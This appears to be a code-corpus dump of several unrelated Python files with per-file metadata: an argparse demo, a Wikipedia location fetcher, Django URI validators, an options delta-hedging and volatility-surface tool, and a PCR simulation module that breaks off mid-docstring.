"usage_type": "attribute" }, { "api_name": "torch.cuda.is_available", "line_number": 293, "usage_type": "call" }, { "api_name": "torch.cuda", "line_number": 293, "usage_type": "attribute" }, { "api_name": "torch.zeros", "line_number": 303, "usage_type": "call" }, { "api_name": "torch.zeros", "line_number": 304, "usage_type": "call" }, { "api_name": "torch.LongTensor", "line_number": 304, "usage_type": "attribute" }, { "api_name": "torch.zeros", "line_number": 305, "usage_type": "call" }, { "api_name": "torch.zeros", "line_number": 306, "usage_type": "call" }, { "api_name": "torch.zeros", "line_number": 307, "usage_type": "call" }, { "api_name": "torch.cuda.is_available", "line_number": 316, "usage_type": "call" }, { "api_name": "torch.cuda", "line_number": 316, "usage_type": "attribute" }, { "api_name": "numpy.array", "line_number": 342, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 345, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 350, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 351, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 355, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 356, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 357, "usage_type": "call" }, { "api_name": "numpy.ones", "line_number": 359, "usage_type": "call" }, { "api_name": "numpy.random.randn", "line_number": 361, "usage_type": "call" }, { "api_name": "numpy.random", "line_number": 361, "usage_type": "attribute" }, { "api_name": "numpy.sqrt", "line_number": 361, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 363, "usage_type": "call" }, { "api_name": "numpy.exp", "line_number": 365, "usage_type": "call" }, { "api_name": "numpy.pi", "line_number": 365, "usage_type": "attribute" }, { "api_name": "numpy.arange", "line_number": 365, "usage_type": "call" }, { "api_name": "numpy.sqrt", "line_number": 365, "usage_type": "call" }, { "api_name": "numpy.arange", "line_number": 375, "usage_type": "call" }, { "api_name": "numpy.arange", "line_number": 376, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 380, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 381, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 382, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 384, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 385, "usage_type": "call" }, { "api_name": "numpy.random.randint", "line_number": 387, "usage_type": "call" }, { "api_name": "numpy.random", "line_number": 387, "usage_type": "attribute" }, { "api_name": "numpy.random.rand", "line_number": 387, "usage_type": "call" }, { "api_name": "numpy.random.randint", "line_number": 388, "usage_type": "call" }, { "api_name": "numpy.random", "line_number": 388, "usage_type": "attribute" }, { "api_name": "numpy.random.rand", "line_number": 388, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 389, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 390, "usage_type": "call" }, { "api_name": "numpy.sqrt", "line_number": 392, "usage_type": "call" }, { "api_name": "numpy.append", "line_number": 395, "usage_type": "call" }, { "api_name": "numpy.sqrt", "line_number": 401, "usage_type": "call" }, { "api_name": "numpy.sqrt", "line_number": 402, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 405, "usage_type": "call" }, { "api_name": "numpy.sqrt", "line_number": 410, "usage_type": "call" }, { "api_name": "numpy.append", "line_number": 411, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 420, "usage_type": "call" }, { "api_name": "numpy.random.randn", "line_number": 422, "usage_type": "call" }, { "api_name": "numpy.random", "line_number": 422, "usage_type": "attribute" }, { "api_name": "numpy.sqrt", "line_number": 422, "usage_type": "call" }, { "api_name": "numpy.floor", "line_number": 427, "usage_type": "call" }, { "api_name": "numpy.sqrt", "line_number": 430, "usage_type": "call" }, { "api_name": "numpy.concatenate", "line_number": 434, "usage_type": "call" }, { "api_name": "numpy.random.rand", "line_number": 441, "usage_type": "call" }, { "api_name": "numpy.random", "line_number": 441, "usage_type": "attribute" }, { "api_name": "torch.zeros", "line_number": 443, "usage_type": "call" }, { "api_name": "torch.zeros", "line_number": 445, "usage_type": "call" }, { "api_name": "torch.cat", "line_number": 453, "usage_type": "call" }, { "api_name": "torch.from_numpy", "line_number": 453, "usage_type": "call" }, { "api_name": "torch.cat", "line_number": 456, "usage_type": "call" }, { "api_name": "torch.from_numpy", "line_number": 456, "usage_type": "call" }, { "api_name": "torch.LongTensor", "line_number": 459, "usage_type": "attribute" }, { "api_name": "torch.optim.RMSprop", "line_number": 491, "usage_type": "call" }, { "api_name": "torch.optim", "line_number": 491, "usage_type": "name" }, { "api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 497, "usage_type": "call" }, { "api_name": "torch.optim", "line_number": 497, "usage_type": "attribute" }, { "api_name": "torch.cuda.is_available", "line_number": 498, "usage_type": "call" }, { "api_name": "torch.cuda", "line_number": 498, "usage_type": "attribute" }, { "api_name": "torch.load", "line_number": 499, "usage_type": "call" }, { "api_name": "torch.load", "line_number": 501, "usage_type": "call" }, { "api_name": "time.time", "line_number": 528, "usage_type": "call" }, { "api_name": "torch.no_grad", "line_number": 536, "usage_type": "call" }, { "api_name": "time.time", "line_number": 562, "usage_type": "call" }, { "api_name": "time.time", "line_number": 580, "usage_type": "call" }, { "api_name": "time.time", "line_number": 600, "usage_type": "call" }, { "api_name": "torch.cuda.is_available", "line_number": 631, "usage_type": "call" }, { "api_name": "torch.cuda", "line_number": 631, "usage_type": "attribute" }, { "api_name": "torch.save", "line_number": 632, "usage_type": "call" }, { "api_name": "torch.save", "line_number": 634, "usage_type": "call" } ]
14336982
import argparse def printParsers(subparser_actions): # but better save than sorry for subparsers_action in subparsers_actions: # get all subparsers and print help for choice, subparser in subparsers_action.choices.items(): print("Subparser '{}'".format(choice)) print(subparser.format_help()) # create the top-level parser parser = argparse.ArgumentParser(prog='PARSING PROGRAM') parser.add_argument('--foo', action='store_true', help='foo help') subparsers = parser.add_subparsers(help='sub-command help') # create the parser for the "A" command parser_a = subparsers.add_parser('A', help='A help') parser_a.add_argument('--bar', type=int, help='bar help') # create the parser for the "B" command parser_b = subparsers.add_parser('B', help='B help') parser_b.add_argument('--baz', '-b', choices='XYZ', help='baz help') #choices='XYZ' # print main help # create the parser for the command "KEY" parser_key = subparsers.add_parser('KEY', help='KEY help') parser_key.add_argument('-k', dest='key', help='Insert key(s): [YAML format]') print(parser.format_help()) # retrieve subparsers from parser subparsers_actions = [ action for action in parser._actions if isinstance(action, argparse._SubParsersAction)] # there will probably only be one subparser_action, #printParsers(subparsers_actions) #________________________________ print('OLOLO') options = parser.parse_args() #if options.bar: # print('[From parser A]', 'bar = ', options.bar) if options.baz: print('[From parser B]', 'baz = ', options.baz)
null
FF-Tool/src_core/parser.py
parser.py
py
1,551
python
en
code
null
code-starcoder2
83
[ { "api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call" }, { "api_name": "argparse._SubParsersAction", "line_number": 35, "usage_type": "attribute" } ]
493718179
import random import wikilocation from wikipedia import wikipedia def get_articles(lat, lon): """ :type lat: str :type lon: str :return: list of dicts representing articles """ # Use really large radius, in case very far away from somewhere. # Results are sorted by distance and limited so that works fine. radius = 20000 # Upper limit landmark_articles = wikilocation.articles(lat, lon, radius, 10, "landmark") # event_articles = wikilocation.articles(lat, lon, radius, 5, "event") if len(landmark_articles) == 0: OLD_STREET_ROUNDABOUT = ("51.525603","-0.087558") lat, lon = OLD_STREET_ROUNDABOUT landmark_articles = wikilocation.articles(lat, lon, radius, 10, "landmark") # wikilocation_articles = event_articles + landmark_articles # wikilocation_articles = random.sample(wikilocation_articles, 5) # wikilocation_articles = _interleave(landmark_articles, event_articles) wikilocation_articles = landmark_articles wikilocation_articles = _remove_lists(wikilocation_articles) articles = [] for wikilocation_article in wikilocation_articles: article = {} title = wikilocation_article["title"] article["title"] = title # first_sentence = wikipedia.summary(title, sentences=1) page = wikipedia.page(title) # article["first_sentence"] = first_sentence article["summary"] = page.summary article["image"] = "http://upload.wikimedia.org/wikipedia/commons/3/3c/Stonehenge2007_07_30.jpg" article["url"] = page.url articles.append(article) return articles # def _interleave(l1, l2): # return [val for pair in zip(l1, l2) for val in pair] def _remove_lists(articles): def not_list(article): return "list" not in article["title"].lower() return filter(not_list, articles)
null
model.py
model.py
py
1,875
python
en
code
null
code-starcoder2
83
[ { "api_name": "wikilocation.articles", "line_number": 16, "usage_type": "call" }, { "api_name": "wikilocation.articles", "line_number": 22, "usage_type": "call" }, { "api_name": "wikipedia.wikipedia.page", "line_number": 39, "usage_type": "call" }, { "api_name": "wikipedia.wikipedia", "line_number": 39, "usage_type": "name" } ]
189195499
from django.core.exceptions import ValidationError from django.utils.translation import ugettext_lazy as _ from rdmo.core.validators import UniqueURIValidator class OptionSetUniqueURIValidator(UniqueURIValidator): app_label = 'options' model_name = 'optionset' def get_uri(self, model, data): uri = model.build_uri(data.get('uri_prefix'), data.get('key')) return uri class OptionUniqueURIValidator(UniqueURIValidator): app_label = 'options' model_name = 'option' def get_uri(self, model, data): if 'key' not in data: raise ValidationError({ 'key': _('This field is required') }) elif 'optionset' not in data: raise ValidationError({ 'optionset': _('This field is required') }) else: path = model.build_path(data.get('key'), data.get('optionset')) uri = model.build_uri(data.get('uri_prefix'), path) return uri
null
rdmo/options/validators.py
validators.py
py
999
python
en
code
null
code-starcoder2
83
[ { "api_name": "rdmo.core.validators.UniqueURIValidator", "line_number": 7, "usage_type": "name" }, { "api_name": "rdmo.core.validators.UniqueURIValidator", "line_number": 17, "usage_type": "name" }, { "api_name": "django.core.exceptions.ValidationError", "line_number": 24, "usage_type": "call" }, { "api_name": "django.utils.translation.ugettext_lazy", "line_number": 25, "usage_type": "call" }, { "api_name": "django.core.exceptions.ValidationError", "line_number": 28, "usage_type": "call" }, { "api_name": "django.utils.translation.ugettext_lazy", "line_number": 29, "usage_type": "call" } ]
337938218
#necessary imports import pandas_datareader as pdr from pandas_datareader.data import DataReader as dr import datetime as dt from datetime import date from yahoo_fin import stock_info as si from yahoo_fin import options import pandas as pd import yfinance as yf import numpy as np import matplotlib.pyplot as plt from mpl_toolkits import mplot3d import DeltaPI from DeltaPI.AutoDiff import AutoDiff from DeltaPI.AutoDiff.AutoDiff import * #first we define Black Scholes function to calculate delta and vega pull uptodate financial data def BS_Delta(ticker, exp_year, exp_month, exp_day, op_type, strike): """ Obtains uptodate financial data for stock price, option price, volatility, risk free rate and calculates delta and vega from Black Scholes equation. Returns delta, vega, time to expiration, most uptodate share price and corresponding option price. INPUTS: ====== ticker: accepts both upper and lower case (string) exp_year: year of expiration (int) exp_month: month of expiration (int) exp_day: day of expiration (int) opt_type: 'puts' for put and 'calls' for call(string) strike: price at which the opion can be excercised (int) OUTPUT: ====== delta_bs: delta calculated using Black Scholes equation (partial derivative w.r.t. share price) vega: vega calculated using Black Scholes euqation (partial derivative w.r.t. share price vol) T_t: time to option expiration as fraction of the year S: share price C: option price NOTES: ====== This fuction pulls most upto date financial data form yahoo finance. The option values are pulled pulled during the market hours (9:30am-4pm, mon-fri). When the market is closed, the function will ask the user to input the option price. Also, just like Black Sholes equation, this function relies on static volatlity measured as historical s.d. of the share price over the past year (i.e. we pull in a year share prices and calculate standard deviation of that for sigma). This function also requires the following pacakges for data retrieval in addition to pandas, numpy amd datetime: import sys !{sys.executable} -m pip install yahoo_fin !{sys.executable} -m pip install requests_html !{sys.executable} -m pip install yfinance EXAMPLE: ======= We are not writing a formal doc test here because the outputs are not static. This illustration should help the user understand how the pakage work. Let's suppose you wanted to run a GE call expriing on Jan 17, 2020, with strike 12. ticker='GE' exp_year=2020 exp_month=1 exp_day=17 exp_date=str(str(exp_month)+'/'+str(exp_day)+'/'+str(exp_year)) op_type='calls' strike=12 delta_bs, vega, T_t, S, C = BS_Delta(ticker, exp_year, exp_month, exp_day, op_type, strike) 0.2803917681986156 0.009142607098052206 0.10684931506849316 11.100000381469727 0.4027907848942922 !!since the function is pulling live data for this doctest the output will keep changing!! """ #convert to exp_date format exp_date=str(str(exp_month)+'/'+str(exp_day)+'/'+str(exp_year)) #get current risk free rate #we are using 10tyear treasury which is industry standard tbills = ['DGS10'] yc = dr(tbills, 'fred') risk_free=np.array(yc)[-1][0]/100 #get current date today=date.today() #get stock price stock = yf.Ticker(ticker) S=stock.history(period='min')['Open'][0] #get price of option closest to the same date/strike as our option try: table=options.get_options_chain(ticker,exp_date ) strikes=table[op_type]['Strike'] closest_strike=min(strikes, key=lambda x: abs(x-strike)) index=table[op_type][table[op_type]['Strike'].isin([closest_strike])==True].index[0] C=np.mean(table[op_type][['Bid','Ask']].iloc[index]) except: print('Could not find live option price, will calculate implied price instead') C=0 #place holder value, we will calculate black scholes implied value below #print('could not find live price for this option type. please enter best available estimate:') #C=float(input("")) def vol_est(today, ticker): #get volatility of underlying assets end = today start=dt.datetime.now() - dt.timedelta(days=365) prices=list(pdr.get_data_yahoo(ticker, start, end)['Adj Close']) returns=[] i=0 while i < (len(prices)-1): r=np.log(prices[i+1]/prices[i]) returns.append(r) i=i+1 vol=np.std(returns)*(250**(1/2)) return vol #setting up all the inputs for the Black Scholes formula vol=vol_est(today, ticker) T=dt.date(exp_year, exp_month, exp_day,) t=today r=risk_free T_t=(T-t).days/365 #first we will calculate d1 and d2 d1=(np.log(S/strike)+(r+vol**2/2)*(T_t))/(vol*((T_t)**(1/2))) d2=d1-vol*(T_t)**(1/2) if C==0: if op_type == 'calls': C=S*(1/(2*np.pi)**(1/2))*np.e**(-d1)*d1 - strike*np.e**(-r*(T_t))*(1/(2*np.pi)**(1/2))*np.e**(-d1)*d1 else: if op_type =='puts': C=strike*np.e**(-r*T_t)*(1/(2*np.pi)**(1/2))*np.e**(d2)*(-d2)-S*(1/(2*np.pi)**(1/2))*np.e**(d1)*(-d1) #now we will calculate delta depending on option type if op_type=='calls': delta_bs=1/((2*np.pi)**(1/2))*np.e**(-d1**2/2) else: delta_bs=1/((2*np.pi)**(1/2))*np.e**(-d1**2/2)-1 #calculate vega (same formula for puts and calls) vega=S/100*np.e**(-T_t)*(T_t**(1/2))*delta_bs return delta_bs, vega, T_t, S, C #now we build a volatility surface plot function def Volatility_Surface(ticker, exp_year, exp_month, exp_day, op_type, strike, price): """ This function calculates and plots 2 volatility 3D surface plots of stock volatlity as calculated by Bharadia and Corrado approximations vs. time and share price of the underlying asset. INPUTS: ====== ticker: accepts both upper and lower case (string) exp_year: year of expiration (int) exp_month: month of expiration (int) exp_day: day of expiration (int) opt_type: 'puts' for put and 'calls' for call(string) strike: price at which the opion can be excercised (int) price: option price (float) OUTPUT: ====== 3Dplot Bharadia: surface plot for estimated stock price volatilty over time to expiration and share price space 3Dplot Corrado: surface plot for estimate of stock volatility over time time to expiration and share price space. NOTES: ====== This function pulls live stock price data and requires the following pacakges to run properly: pandas numpy mpl_toolkits matplotlib.pyplot datetime yahoo_fin requests_html yfinance """ #current data today=date.today() T=dt.date(exp_year, exp_month, exp_day,) #cacl time to expiration t=today T_t=(T-t).days/365 #calculate volatility def vol_est(today, ticker): #get volatility of underlying assets end = today start=dt.datetime.now() - dt.timedelta(days=365) prices=list(pdr.get_data_yahoo(ticker, start, end)['Adj Close']) sd=np.std(prices) return sd vol=vol_est(today, ticker) stock = yf.Ticker(ticker) S=stock.history(period='min')['Open'][0] #create a range of stock prices based on a + - 2 standard dev band (95% CI) S_low=int(S-2*vol) S_high=int(S+2*vol) S_range=list(range(S_low, S_high)) #create an entire range of days upto the expriation date days_range=list(range(1,int((T-t).days))) C=price vol_s=[] vol_c=[] #get range of volatlities for both methods for i, t in enumerate(days_range): vol_t=[] vol_tc=[] for i, s in enumerate(S_range): vol_simple=(2*np.pi/(t/365))**(1/2)*((C-(s-strike))/2)/(s-(s-strike)/2) vol_t.append(vol_simple) vol_complex=((2*np.pi/(t/365))**2)**(1/2)*1/(s+strike)*(((C-(s-strike)/2+((C-(s-strike)/2))**2-(s-strike)**2/np.pi)**2)**(1/2))**(1/2) vol_tc.append(vol_complex) vol_s.append(vol_t) vol_c.append(vol_tc) data = np.array(vol_s) #prepare the data for plotting #plot Bharadia approximation x, y = np.meshgrid(S_range,days_range) fig = plt.figure(figsize=(12,10)) ax = plt.axes(projection='3d') ax.plot_surface(x, y, data, rstride=1, cstride=1,cmap='viridis', edgecolor='none') ax.set_title('Volatility Surface Simple (Bharadia et al. )') ax.set_xlabel('stock price') ax.set_ylabel('days to expiration') ax.set_zlabel('volatility') ax.view_init(30, 35) plt.show(fig) data = np.array(vol_c) #plot Corrado approximation x, y = np.meshgrid(S_range,days_range) fig = plt.figure(figsize=(12,10)) ax = plt.axes(projection='3d') ax.plot_surface(x, y, data, rstride=1, cstride=1,cmap='viridis', edgecolor='none') ax.set_title('Volatility Surface Complex (Corrado et al. )') ax.set_xlabel('stock price') ax.set_ylabel('days to expiration') ax.set_zlabel('volatility') ax.view_init(30, 35) plt.show(fig) def OptionsRun(): """ This an interactive enclosing functionn for two nested functions that prompts the user to enter the details about their option position and returns 3 deltas calculated with Black Scholes formula, Bharadia and Corrado estimation. The closure also calculates the amounnt of stock that the user needs to buy or sell short to hedge their position and plots 2 volatlity surfaces. INPUTS: (user prompted to enter these in the following order) ====== option type: the user is prompted to enter option type or exit ticker: accepts both upper and lower case (string), checks if its valid strike: price at which the opion can be excercised (int) exp_year: year of expiration (int), checks if its valid exp_month: month of expiration (int), checks if its valid exp_day: day of expiration (int), checks if its valid position: number of long/short puts or calls for this stock that are on the books OUTPUT: ====== delta Black Sholes: deploying BS_Delta function above, Black Scholes delta is returned delta Bharadia: deploying AutoDiff package partial derrivatives of implied vol are calculated and delta estimate is returned delta Corrado: deploying AutoDiff package partial derrivatives of implied vol are calculated and delta estimate is returned hedging indstructions: whether the trader should buy or sell short and how much of the underlying asset. two plots: volatlity surface plots for Bharadia and Corrado methods respectively NOTES: ====== This package relies on yahoo_fin and yfinance packages for live stock prices and option price data as well as stock's historical standard deviation calculated from the data pulled for the share price from the previous year. If there are any issues with the yahoo_fin and/or yfinance pacakges being able to pull this data due to yahoo specific glitches, this extension package will not run. In the 'real world' application, this package would be linked to a more realiable platform like Bloomberg, which is what most of the traders use but is very expensive. Yahoo finance is free but slow and not always reliable. """ def ObtainInputs(): #nested function to collect data from the user print("Please Select Type of Option to Evaluate") print("1) Exit") print("2) Puts") print("3) Calls") try: option=int(input("")) except: print("Please enter number from the options above: ") option=int(input("")) #collect option type variable while option not in [1,2,3]: option=int(input("Please enter number from the options above: ")) if option==3: op_type='calls' else: if option==2: op_type='puts' else: print('Thank you. Goodbye!') return #collect ticker variable print("Please Enter Ticker") try: value = str(input('')) stock = yf.Ticker(value)#checking if the ticker is valid S=stock.history(period='min')['Open'][0] #si.get_live_price(value) #use this if yfinance is not working except ValueError: print ("Sorry, {} is not a valid ticker, try again".format(value)) ObtainInputs() ticker=value #collect strike value print("Please Enter Strike") try: option=int(input("")) except: ValueError ("Please enter integer value ") strike=option def Date(): #nested function to organize and validate data values today=date.today() print("Please Enter Expiration Year") try: option=int(input("")) if option<today.year or option > (today.year+2): print("Please enter a valid listed year") option=int(input("")) except: ValueError ("Please enter an integer value ") exp_year=option print("Please Enter Expiration Month") try: value=int(input("")) except: ValueError ("Please enter valid date ") if value>12 or value<1: print("Invalid input for Month. Please try again") value=int(input("")) if exp_year==today.year and value<today.month: print("Invalid input for Month. Please try again") value=int(input("")) exp_month=value print("Please Enter Expiration Day") try: option=int(input("")) exp_day=option except: ValueError ("Please enter valid date ") if exp_month in [1,3,5,7,8,10,12]: if option>31 or option <1: print("Invalid input for day. Please try again") option=int(input("")) else: if exp_month==2 and exp_year==2020: if option>29 or option <1: print("Invalid input for day. Please try again") option=int(input("")) else: if exp_month in [4,6,9,11]: if option>30 or option<1: print("Invalid input for day. Please try again") option=int(input("")) exp_dat=option exp_date=str(str(exp_month)+'/'+str(exp_day)+'/'+str(exp_year)) return exp_year, exp_month, exp_day, exp_date #obtain the valid dates in the right format exp_year, exp_month, exp_day, exp_date = Date() #calculate black scholes delta delta_bs, vega, T_t, S, C = BS_Delta(ticker, exp_year, exp_month, exp_day, op_type, strike) #print output print("Black Scholes Delta: ", delta_bs) K = AutoDiff(strike, 1) #####################--AUTODIFF USED HERE simple_implied = np.sqrt(2*np.pi/T_t) * ( ( C -(S - K)/2 ) / ( S - (S - K)/2 ) ) deltaPi_simple_implied= simple_implied.derv complex_implied = np.sqrt(2*np.pi/T_t) * (1/(S + K)) * ( C - ((S - K)/2)\ + np.sqrt( (C - (S-K)/2)**2 - (S -K)**2/np.pi )) deltaPi_complex_implied = complex_implied.derv delta_simple=delta_bs+vega*deltaPi_simple_implied delta_complex=delta_bs+vega*deltaPi_complex_implied #print deltas after calculating them if delta_complex is None: delta_complex=delta_simple print('Could not approximate Corrado due to complex numbers ') print("Bharadia delta: ", delta_simple) print("Corrado delta: ", delta_complex) #check if the user would like to get delta hedging advice print("Would You Like to Delta Hedge Your Position: y/n?") try: option=str(input("")) except: raise ValueError("please entery 'y' or 'n'") if option=='y': print("How many units? Enter + values for long and - values for short") try: option=int(input("")) except: raise ValueError('please enter an integer value') units=option if option >0 and op_type=='puts': action = 'buy' elif option>0 and op_type=='calls': action = 'sell short' elif option <0 and op_type=='calls': action ='buy' elif option <0 and op_type=='puts': action = 'sell short' recomend=abs(int(units*delta_bs)) recomend1=abs(int(units*delta_simple)) recomend2=abs(int(units*delta_complex)) print("According to Black Scholes you need to ", action, "",abs(int(recomend)), " shares of ",ticker ) print("According to Bharadia apporach you need to ", action, "",abs(int(recomend1)), " shares of ", ticker) print("Accoding to Corrado approach you need to ", action, "", abs(int(recomend2)), " shares of ", ticker) #plot 3D vol plots Volatility_Surface(ticker, exp_year, exp_month, exp_day, op_type, strike,C) return else: #plot 3D vol polots Volatility_Surface(ticker, exp_year, exp_month, exp_day, op_type, strike, C) return return ObtainInputs() OptionsRun()
null
build/lib/DeltaPI/Extension/DeltaHedgePi.py
DeltaHedgePi.py
py
19,253
python
en
code
null
code-starcoder2
83
[ { "api_name": "pandas_datareader.data.DataReader", "line_number": 88, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 89, "usage_type": "call" }, { "api_name": "datetime.date.today", "line_number": 91, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 91, "usage_type": "name" }, { "api_name": "yfinance.Ticker", "line_number": 93, "usage_type": "call" }, { "api_name": "yahoo_fin.options.get_options_chain", "line_number": 97, "usage_type": "call" }, { "api_name": "yahoo_fin.options", "line_number": 97, "usage_type": "name" }, { "api_name": "numpy.mean", "line_number": 101, "usage_type": "call" }, { "api_name": "datetime.datetime.now", "line_number": 111, "usage_type": "call" }, { "api_name": "datetime.datetime", "line_number": 111, "usage_type": "attribute" }, { "api_name": "datetime.timedelta", "line_number": 111, "usage_type": "call" }, { "api_name": "pandas_datareader.get_data_yahoo", "line_number": 112, "usage_type": "call" }, { "api_name": "numpy.log", "line_number": 116, "usage_type": "call" }, { "api_name": "numpy.std", "line_number": 119, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 123, "usage_type": "call" }, { "api_name": "numpy.log", "line_number": 128, "usage_type": "call" }, { "api_name": "numpy.pi", "line_number": 132, "usage_type": "attribute" }, { "api_name": "numpy.e", "line_number": 132, "usage_type": "attribute" }, { "api_name": "numpy.e", "line_number": 135, "usage_type": "attribute" }, { "api_name": "numpy.pi", "line_number": 135, "usage_type": "attribute" }, { "api_name": "numpy.pi", "line_number": 138, "usage_type": "attribute" }, { "api_name": "numpy.e", "line_number": 138, "usage_type": "attribute" }, { "api_name": "numpy.pi", "line_number": 140, "usage_type": "attribute" }, { "api_name": "numpy.e", "line_number": 140, "usage_type": "attribute" }, { "api_name": "numpy.e", "line_number": 142, "usage_type": "attribute" }, { "api_name": "datetime.date.today", "line_number": 183, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 183, "usage_type": "name" }, { "api_name": "datetime.date", "line_number": 184, "usage_type": "call" }, { "api_name": "datetime.datetime.now", "line_number": 192, "usage_type": "call" }, { "api_name": "datetime.datetime", "line_number": 192, "usage_type": "attribute" }, { "api_name": "datetime.timedelta", "line_number": 192, "usage_type": "call" }, { "api_name": "pandas_datareader.get_data_yahoo", "line_number": 193, "usage_type": "call" }, { "api_name": "numpy.std", "line_number": 194, "usage_type": "call" }, { "api_name": "yfinance.Ticker", "line_number": 197, "usage_type": "call" }, { "api_name": "numpy.pi", "line_number": 213, "usage_type": "attribute" }, { "api_name": "numpy.pi", "line_number": 215, "usage_type": "attribute" }, { "api_name": "numpy.array", "line_number": 220, "usage_type": "call" }, { "api_name": "numpy.meshgrid", "line_number": 225, "usage_type": "call" }, { "api_name": "matplotlib.pyplot.figure", "line_number": 226, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 226, "usage_type": "name" }, { "api_name": "matplotlib.pyplot.axes", "line_number": 227, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 227, "usage_type": "name" }, { "api_name": "matplotlib.pyplot.show", "line_number": 234, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 234, "usage_type": "name" }, { "api_name": "numpy.array", "line_number": 237, "usage_type": "call" }, { "api_name": "numpy.meshgrid", "line_number": 240, "usage_type": "call" }, { "api_name": "matplotlib.pyplot.figure", "line_number": 241, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 241, "usage_type": "name" }, { "api_name": "matplotlib.pyplot.axes", "line_number": 242, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 242, "usage_type": "name" }, { "api_name": "matplotlib.pyplot.show", "line_number": 249, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 249, "usage_type": "name" }, { "api_name": "yfinance.Ticker", "line_number": 315, "usage_type": "call" }, { "api_name": "datetime.date.today", "line_number": 335, "usage_type": "call" }, { "api_name": "datetime.date", "line_number": 335, "usage_type": "name" }, { "api_name": "DeltaPI.AutoDiff.AutoDiff", "line_number": 393, "usage_type": "call" }, { "api_name": "numpy.sqrt", "line_number": 395, "usage_type": "call" }, { "api_name": "numpy.pi", "line_number": 395, "usage_type": "attribute" }, { "api_name": "numpy.sqrt", "line_number": 397, "usage_type": "call" }, { "api_name": "numpy.pi", "line_number": 397, "usage_type": "attribute" }, { "api_name": "numpy.sqrt", "line_number": 398, "usage_type": "call" }, { "api_name": "numpy.pi", "line_number": 398, "usage_type": "attribute" } ]
491245277
import os.path import sqlite3 from Bio.Seq import Seq from Bio.SeqRecord import SeqRecord from Bio import SeqIO import pandas as pd class Template: """PCR template. Parameters ---------- seqrecord : Bio.SeqRecord Mostly used with element in Bio.SeqIO.parse iterator. Attributes ---------- seq : Bio.Seq Unambiguous DNA/RNA sequence. Gap supported. description : str FASTA header line. id : str Unique sequence identifier. taxonomy : str Semicolon-separated, hierarchical taxonomic classification. """ def __init__(self, seqrecord): if not isinstance(seqrecord, SeqRecord): raise TypeError self._seqrecord = seqrecord self.seq = self._seqrecord.seq self.description = self._seqrecord.description self.id = self._seqrecord.id self.taxonomy = self.description.split(' ', 1)[1] class Primer(Seq): """PCR primer. A copy of Bio.Seq class. """ pass class PrimerPool: """PCR primer pool. A collection of DNA primers for one strand. Must share the same starting and ending coordinates. Parameters ---------- name : str Primer pool name. start : int 1-based genomic coordinate indicating where the primer starts. end : int 1-based genomic coordinate indicating where the primer ends. primers : list of Primer or list of Seq, or None, default None Primers for one strand. Specified upon instance creation or by instance method later. """ def __init__(self, name, start, end, primers): if not isinstance(start, int): raise TypeError if not isinstance(end, int): raise TypeError if not isinstance(primers, list): raise TypeError if any(map(lambda x: not isinstance(x, Primer), primers)): raise TypeError self.name = name self.start = start self.end = end self.primers = primers class PCRMatch: def __init__(self, id, taxonomy, fw_match, rv_match, is_amplified): self.id = id self.taxonomy = taxonomy self.fw_match = fw_match self.rv_match = rv_match self.is_amplified = is_amplified class PCR: """in silico PCR. Simulate PCR on a template sequence with forward primer pool and reverse primer pool following certain rules defining primer/template match. Parameters ---------- template : Template PCR template. Support gapped/ungapped DNA/RNA sequence. fw_primer_pool : PrimerPool Forward primer pool containing one or multiple primers. rv_primer_pool : PrimerPool Reverse primer pool containing one or multiple primers. find_match : function Function to determine if primer could bind to template. Only return boolean value. """ def __init__(self, template, fw_primer_pool, rv_primer_pool, find_match): if not isinstance(template, Template): raise TypeError if not isinstance(fw_primer_pool, PrimerPool): raise TypeError if not isinstance(rv_primer_pool, PrimerPool): raise TypeError self.template = template self.fw_primer_pool = fw_primer_pool self.rv_primer_pool = rv_primer_pool self._find_match = find_match def cut_forward_primer_from_template(self): start = self.fw_primer_pool.start - 1 end = self.fw_primer_pool.end return self.template.seq[start:end] def cut_reverse_primer_from_template(self): start = self.rv_primer_pool.start - 1 end = self.rv_primer_pool.end return self.template.seq[start:end] def run(self): """Run in silico PCR. """ GAP = '-' # gap placeholder UNKNOWN = '.' # leading and trailing placeholder # cut primer from template and back transcribe to DNA fw_tmplt = self.cut_forward_primer_from_template().back_transcribe() rv_tmplt = self.cut_reverse_primer_from_template().back_transcribe() # ungap fw_tmplt = fw_tmplt.ungap(UNKNOWN).ungap(GAP) rv_tmplt = rv_tmplt.ungap(UNKNOWN).ungap(GAP) # test match for fw in self.fw_primer_pool.primers: if self._find_match(str(fw), str(fw_tmplt)): fw_match = True break fw_match = False for rv in self.rv_primer_pool.primers: if self._find_match(str(rv.reverse_complement()), str(rv_tmplt)): rv_match = True break rv_match = False is_amplified = fw_match and rv_match return PCRMatch(self.template.id, self.template.taxonomy, fw_match, rv_match, is_amplified) class PCRArray: def __init__(self, fasta_path, fw_path, rv_path): self._fasta_path = fasta_path self._fw_path = fw_path self._rv_path = rv_path @staticmethod def parse_primer_pool(path): """Parse file containing primer pool. Assuming primers stored in this format: #515f 11895-13861 GTGCCAGCAGTCGCGGTAA GTGCCAGCAGGAGCGGTAA 